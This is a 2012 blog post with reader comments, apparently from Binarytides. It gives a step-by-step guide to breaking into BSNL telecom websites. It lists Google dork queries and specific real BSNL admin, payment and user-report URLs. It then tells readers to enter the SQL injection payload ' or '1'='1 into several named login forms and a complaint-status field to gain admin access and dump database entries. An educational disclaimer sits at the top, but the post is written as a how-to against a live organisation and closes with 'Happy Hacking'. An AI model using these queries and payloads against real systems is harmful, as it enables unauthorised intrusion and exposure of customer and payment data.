Hack Bsnl websites easily

Disclaimer: The information provided below is for educational purposes only. The author is not responsible for any misuse of the information and discourages any illegal use of it.



Yes, we shall hack the BSNL website easily, easily enough for a nursery kid. We shall be using Google Hacking and SQL Injection techniques.

So let's begin.

Search this in google :

inurl:bsnl.co.in/admin

In the search results, go to the second page. You will see plenty of links of the type:

www.billchn.bsnl.co.in/admin/

Open that link and you will see lots of source code files.

Many of the links on this page show good information like :

Payment information - http://www.billchn.bsnl.co.in/admin/consol.jsp
Transaction information - http://www.billchn.bsnl.co.in/admin/consolidatedreport.jsp
Registered user page - http://www.billchn.bsnl.co.in/admin/registereduser.jsp

Even an administration page is available without login :
http://billchn.bsnl.co.in/modifypassword.jsp
and here :

http://www.billchn.bsnl.co.in/selectmodifyoption.jsp

Check out what can be hacked from there.

So you hacked into bsnl servers and found some information that should be password protected. If you are a creative hacker then try getting into the system with a proper login.

This is the login page :
http://www.billchn.bsnl.co.in/adminlogin.html

Another google hack term :

site:bsnl.co.in inurl:admin

Search the above and you might get some more interesting links like :

http://www.str.bsnl.co.in:8009/y_circulars_list_v.asp?showmaster=1&categary=Admin

http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=5&selected_year=2005&selected_c_institute_cd=TINST_26&selected_faculty=admin

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=admin


http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_17&selected_faculty=DE+ADMIN

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=&selected_faculty=DE+ADMIN

http://training.bsnl.co.in/MAIN_MODULE/telephone_directory.asp?selected_c_institute_cd=TINST_5&selected_faculty=admin

http://training.bsnl.co.in/reports_module/nominations_status.asp?selected_month=11&selected_year=2001&selected_c_institute_cd=&selected_faculty=ALL

The above links appear to be pages that should have been password protected, but they are publicly visible.

Want to hack more ?

Search for this :

site:bsnl.co.in inurl:login

and you will find urls like :

http://mpintranet.bsnl.co.in/wireless/login.asp
http://mpintranet.bsnl.co.in/fbooking/login.asp

All the above URLs are vulnerable to SQL injection. Enter the following as both username and password:

' or '1'='1

The whole string above is to be entered. The "or" does not mean that you enter one of them.

and you should be logged in. Happy Hacking!!

Try this url :
http://udaan.bsnl.co.in/

with username/password as :

' or '1'='1

Here is a screenshot :

On the same url udaan.bsnl.co.in , check the link called "View My Complain Status".
The url is http://udaan.bsnl.co.in/complaint/view_complaint_status.php

Enter the following in the Contact No field

' or '1'='1

and hit Enter. Right away it will display all the entries in the database. Excellent hack, isn't it?

Want to hack more ? Still not satisfied ? OK

Open this url :

http://www.vas.bsnl.co.in/stm/index.jsp

and login with

' or '1'='1

as username and password , and you would be logged in as admin. Here is a screenshot :

Funny isn't it ?

Want another website ? Sure :

http://www.civil.bsnl.co.in:8080/civilbsnl/login.jsp

Login with :

' or '1'='1

as the username and abcd as the password. You should get logged in and the Administration Panel should be available.
Here is a screenshot :

Well done once again Bsnl !!

Note

Everything shown above is the result of poor and insecure application development at BSNL. The websites are vulnerable to various kinds of exploits such as SQL injection and information leaks due to improper authentication checks. BSNL surely needs to fix them.

References :

1. SQL Injection Tutorial : http://en.wikipedia.org/wiki/SQL_injection


Last Updated On : 6th August 2012
  • Pradyumna

    I am confused by the password ' or '1'='1

    please help i am confused by ‘ , or , = ,
    please give me separate passwords

  • mastermansachin

    u rocked man!

    but few problem is there
    the site is not opening

  • http://www.villboy.com Souvik Pratiher

    You rock man

    Love U Binarytides

    U r The best Of all

    Live 1000 years
    LOve U